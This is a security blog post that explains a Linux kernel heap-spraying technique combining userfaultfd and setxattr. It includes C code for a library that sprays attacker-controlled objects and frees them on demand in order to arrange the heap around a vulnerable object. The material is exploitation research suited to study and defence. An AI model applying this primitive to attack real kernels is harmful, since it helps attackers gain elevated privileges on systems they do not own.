Universal heap spraying strategy – userfaultfd + setxattr

08/10/2020

Kernel Dig

I read a post about a new heap spraying strategy by Vitaly Nikolenko a few weeks ago. It uses userfaultfd + setxattr to spray data of arbitrary size on the heap. Since I couldn't find any existing code snippets for this strategy, I wrote a demonstration to share with the public.

Walkthrough

High-level idea
Low-level details
The tricky part
Code snippet

High-level idea

I highly recommend reading that post before this one, though I will describe the technique briefly here to avoid any misunderstanding. The main idea is to use userfaultfd() to control the lifetime of the data that setxattr() allocates in kernel space. Unlike heap spraying methods with limited capabilities, such as msgsnd(), userfaultfd() + setxattr() is powerful enough to work for any kind of heap spray:

There is no header overhead or size limitation. userfaultfd() + setxattr() gives you control over objects of any size, even very small ones such as kmalloc-8.
The data allocated in kernel space is fully controlled by user input.
The lifetime of the data (allocation and free) is decided by userspace.

The basic idea is to register a userspace page with userfaultfd() so that pagefaults on it are delivered to userspace. We then trigger a pagefault inside setxattr(), which suspends the calling context and leaves the data sitting in kernel space. To free it, just handle the pagefault in userspace by invoking ioctl().

As you can see, setxattr() performs the allocation and release, while userfaultfd() controls when they happen.

Low-level details

How to make the pagefault?

Allocate two adjacent pages. Put the data you want copied into kernel space at the end of the first page, and make the copy length run into the second page, so that the copy triggers a pagefault there.

How to let the data stay or be freed?

Remember to register a handler for page 2 in advance with userfaultfd(); the fault will then be passed to a thread we create in userspace. If you leave the fault unhandled, the setxattr() call stays stuck in copy_from_user() and the allocation stays alive. Once you handle the pagefault by invoking ioctl(), the call wakes up, finishes the copy, and the buffer is freed by kvfree().

static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
	 size_t size, int flags)
{
	int error;
	void *kvalue = NULL;

	...

	if (size) {
		...
		kvalue = kvmalloc(size, GFP_KERNEL);
		if (!kvalue)
			return -ENOMEM;
		if (copy_from_user(kvalue, value, size)) {
			error = -EFAULT;
			goto out;
		}
		...
	}

	...
out:
	kvfree(kvalue);

	return error;
}

How to build an efficient heap sprayer?

As you may have noticed, each setxattr() call involves two pages. You can reuse the same two pages for every call, but then you cannot free only a few of the objects: all of them are released at once when you handle the pagefault in userspace. So let's separate spraying into two modes: high-volume spraying and precise allocation.

For high-volume spraying, we create a thread pool that continuously sprays large amounts of data onto the heap. Each spraying thread has its own two pages for triggering the pagefault. Within each spraying thread, we create many threads that invoke setxattr() and one thread that handles the pagefault.

For precise allocation, we give each spraying thread its own unique pair of pages. We create only one thread to call setxattr() and one thread to handle the pagefault, so freeing one object does not disturb the others.

How does userfaultfd work?

userfaultfd() is a system call that must be enabled in the kernel config by setting CONFIG_USERFAULTFD=y. The basic walkthrough is:

Create and enable userfaultfd object

// create a userfaultfd object
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
    errExit("userfaultfd");

// enable the userfaultfd object
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
    errExit("ioctl-UFFDIO_API");

// register the range where you want to catch the pagefault. n_addr is its
// start; in our case, we set it to the address of page 2
uffdio_register.range.start = (unsigned long) n_addr;
uffdio_register.range.len = page_size;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
    errExit("ioctl-UFFDIO_REGISTER");
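If the setup above fails, or faults from setxattr() are never delivered, one thing worth checking besides CONFIG_USERFAULTFD is the vm.unprivileged_userfaultfd sysctl. As far as I know it was added in Linux 5.2, and since 5.11 it defaults to 0, which stops unprivileged processes from catching faults raised in kernel code such as copy_from_user(). The helper below is a minimal sketch for reading it; read_unprivileged_uffd() is a hypothetical name and not part of the library.

```c
#include <stdio.h>

/* Hypothetical helper: return the integer stored in the given sysctl file,
 * or -1 if the file cannot be opened or parsed (for example on kernels
 * that predate the sysctl). */
static int read_unprivileged_uffd(const char *path)
{
    FILE *f = fopen(path, "r");
    int value = -1;

    if (f == NULL)
        return -1;
    if (fscanf(f, "%d", &value) != 1)
        value = -1;
    fclose(f);
    return value;
}
```

A typical call would be read_unprivileged_uffd("/proc/sys/vm/unprivileged_userfaultfd"). A result of 0 suggests the spray needs extra privileges (or the sysctl set to 1) on that machine.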

Create a page that will be copied into the faulting region

if (page == NULL) {
    page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
           MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
           errExit("mmap");
}

...

uffdio_copy.src = (unsigned long) page;

Launch a thread for handling the pagefault and wait.

static void *
fault_handler_thread(void *arg)
{
    struct uffd_msg msg;   /* Data read from userfaultfd */
    int fault_cnt = 0;     /* Number of faults so far handled */
    long uffd, id;  
    char *page;    
    void *addr;       
    struct uffdio_copy uffdio_copy;
    ssize_t nread;

    uffd = ((struct spray_argv*)arg)->fd;
    page = ((struct spray_argv*)arg)->page_fault;
    addr = ((struct spray_argv*)arg)->addr;
    id = ((struct spray_argv*)arg)->id;
   
    for (;;) {
        struct pollfd pollfd;
        int nready;
        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);
        if (nready == -1)
            errExit("poll");

        nread = read(uffd, &msg, sizeof(msg));
        if (nread == 0) {
            printf("EOF on userfaultfd!\n");
            exit(EXIT_FAILURE);
        }

        if (nread == -1)
            errExit("read");

        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            fprintf(stderr, "Unexpected event on userfaultfd\n");
            exit(EXIT_FAILURE);
        }

        // Block on a mutex before handling the pagefault, so the data
        // stays in kernelspace. Since we have multiple spraying threads,
        // there is an array of locks, indexed by thread id.
        pthread_mutex_lock(lock[id]);

        uffdio_copy.src = (unsigned long) page;

        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
                                          ~(page_size - 1);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;

        // Handle the pagefault, the allocated data will be freed.
        if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
            errExit("ioctl-UFFDIO_COPY");
    }
}
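The handler above reads its parameters from struct spray_argv and blocks on lock[id], neither of which is shown here. A definition consistent with those accesses might look like the sketch below. The field types, MAX_SPRAY_THREADS, and new_spray_argv() are my assumptions for illustration, inferred only from how the handler uses them.

```c
#include <pthread.h>
#include <stdlib.h>

#define MAX_SPRAY_THREADS 64   /* assumed upper bound, not from the library */

/* Assumed layout, inferred from the fields the handler dereferences. */
struct spray_argv {
    int   fd;          /* userfaultfd descriptor */
    char *page_fault;  /* source page handed to UFFDIO_COPY */
    void *addr;        /* start of the registered range (page 2) */
    long  id;          /* index into lock[] */
};

/* The handler calls pthread_mutex_lock(lock[id]), so lock[] holds pointers. */
static pthread_mutex_t *lock[MAX_SPRAY_THREADS];

/* Hypothetical constructor: allocate the argument block and its mutex. */
static struct spray_argv *new_spray_argv(int fd, char *page, void *addr, long id)
{
    struct spray_argv *a;

    if (id < 0 || id >= MAX_SPRAY_THREADS)
        return NULL;
    a = calloc(1, sizeof(*a));
    if (a == NULL)
        return NULL;
    lock[id] = malloc(sizeof(pthread_mutex_t));
    if (lock[id] == NULL || pthread_mutex_init(lock[id], NULL) != 0) {
        free(lock[id]);
        lock[id] = NULL;
        free(a);
        return NULL;
    }
    a->fd = fd;
    a->page_fault = page;
    a->addr = addr;
    a->id = id;
    return a;
}
```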

Tricky part

The coding takes some work, but I understood the workflow quickly with the help of the excellent man page and its example. Still, I did run into several technical problems.

The order of allocations and releases gets messed up

I use a loop that iteratively spawns new spraying threads. However, the threads do not always run first come, first served: sometimes a thread that was launched later invokes setxattr() earlier. To solve this problem, I use a mutex to make sure the spraying happens in the right order.

void fork_and_spray(int round, int objs_each_round, int shade, int new_page) {
   ...
   if (pthread_mutex_init(lock[i], NULL) != 0) { 
         printf("\n mutex init has failed\n"); 
         return; 
   }

   // Suspend here and wait for unlocking.
   pthread_mutex_lock(&order_lock);
   pthread_mutex_lock(lock[i]);
}

static void *
fault_handler_thread(void *arg) {
   ...
   if (msg.event != UFFD_EVENT_PAGEFAULT) {
         fprintf(stderr, "Unexpected event on userfaultfd\n");
         exit(EXIT_FAILURE);
   }

   // Unlock the lock to run the next iteration
   pthread_mutex_unlock(&order_lock);
   pthread_mutex_lock(lock[id]); 

   uffdio_copy.src = (unsigned long) page;
   ...

   // This time the lock orders the frees: once the first object is
   // freed, the second one may go
   pthread_mutex_unlock(&order_lock);
}
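The same handshake can be tried in isolation, without userfaultfd. The sketch below is my own stand-in rather than the library's code: each worker plays the role of a spraying thread plus its fault handler, and I have swapped the mutexes for POSIX semaphores, because posting a semaphore from a different thread than the waiter is well-defined, whereas unlocking a default pthread mutex from a thread that does not own it is not. All names here are hypothetical.

```c
#include <pthread.h>
#include <semaphore.h>

#define N_WORKERS 4

static sem_t parked;             /* worker -> spawner: "I reached my blocking point" */
static sem_t gate[N_WORKERS];    /* spawner -> worker i: "you may finish now" */
static int arrival[N_WORKERS];   /* ids in the order the workers parked */
static int n_arrived;
static pthread_t tid[N_WORKERS];

static void *worker(void *arg)
{
    long id = (long)arg;

    /* Only one worker runs this at a time, because the spawner waits on
     * `parked` before creating the next thread. */
    arrival[n_arrived++] = (int)id;
    sem_post(&parked);       /* stands in for "the pagefault has arrived" */
    sem_wait(&gate[id]);     /* stands in for "leave the fault unhandled" */
    return NULL;             /* stands in for UFFDIO_COPY and the free */
}

/* Start the workers strictly one after another. */
static int spawn_in_order(void)
{
    if (sem_init(&parked, 0, 0) != 0)
        return -1;
    for (long i = 0; i < N_WORKERS; i++) {
        if (sem_init(&gate[i], 0, 0) != 0)
            return -1;
        if (pthread_create(&tid[i], NULL, worker, (void *)i) != 0)
            return -1;
        sem_wait(&parked);   /* do not start worker i+1 until worker i is parked */
    }
    return 0;
}

/* Release one parked worker and wait until it has really finished. */
static void release(int id)
{
    sem_post(&gate[id]);
    pthread_join(tid[id], NULL);
}
```

After spawn_in_order() returns, arrival[] holds the ids in launch order, and release() can be called for any id in any order.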

Code snippet

The library is released on my GitHub. The most important functions are described below.

Initialize the spraying strategy

init_heap_spray(int _objectSize, char* _payload, int _payloadSize);

Specify the object size, the payload you want to copy to the kernelspace, and the size of payload.

Do a high-volume spray

do_heap_spray(int loop);

Specify how many rounds to spray. Each round sprays 64 objects by default.

#define OBJS_EACH_ROUND 64

If you would like to change the number of objects sprayed each round, change default_objs_num.

Do a precise allocation

do_spray(round, shade)

The first argument is the same as in do_heap_spray(). The second argument, shade, determines whether the payload's value is incremented by one each round. If shade is 1, the value of the payload increments by one each round; for example, the payload is AAAAAAAA in the first round and BBBBBBBB in the second. The payload resets with each new do_spray() call. This can help when you are trying to work out how many objects to free before the vulnerable object lands in the right place.
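To make the shade behaviour concrete, here is a minimal sketch of how a per-round payload could be derived. shade_payload() is a hypothetical helper written for this post; the library may implement the feature differently.

```c
#include <stddef.h>

/* Hypothetical helper: fill dst with the payload for a given round.
 * With shade == 0 every round gets the same bytes; with shade == 1 each
 * byte is bumped by the round index, so 'A' becomes 'B' in round 1. */
static void shade_payload(char *dst, const char *payload, size_t len,
                          int round, int shade)
{
    for (size_t i = 0; i < len; i++) {
        unsigned char b = (unsigned char)payload[i];

        if (shade)
            b = (unsigned char)(b + round);   /* wraps around past 0xff */
        dst[i] = (char)b;
    }
}
```

When the sprayed objects are later inspected, the byte value then tells you which round an object came from.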

Free an object

void do_free(u_int64_t val);

You can pass either the index of the object or the address of the mutex that fault_handler_thread() is blocked on. For example:

do_spray(10, 0);
do_free(0);
do_free(1);
do_free(2);
do_free(3);
do_free(4);

We first spray 10 objects on the heap, then free the first 5. Keep in mind that the free action does not directly invoke a system call to release the object; it only unlocks the mutex in fault_handler_thread(). This step is asynchronous, so sleeping briefly afterwards helps (e.g. usleep(500);).

Modify the payload

void change_payload(char* payload, int size);

Sometimes we want to change the payload. Pass the new payload as the first argument, followed by its size.

Customize spraying

void fork_and_spray(int round, int objs_each_round, int shade, int new_page);

You may call fork_and_spray() directly for finer control.

The first argument is how many rounds to spray.

The second argument is how many objects are sprayed in each round.

The third argument enables the shade feature.

The fourth argument determines whether to allocate new pages for the pagefault or reuse the previous ones.

A simple demo

Build a simple demo with gcc -pthread -o heap_fs heap_fs.c -D TEST
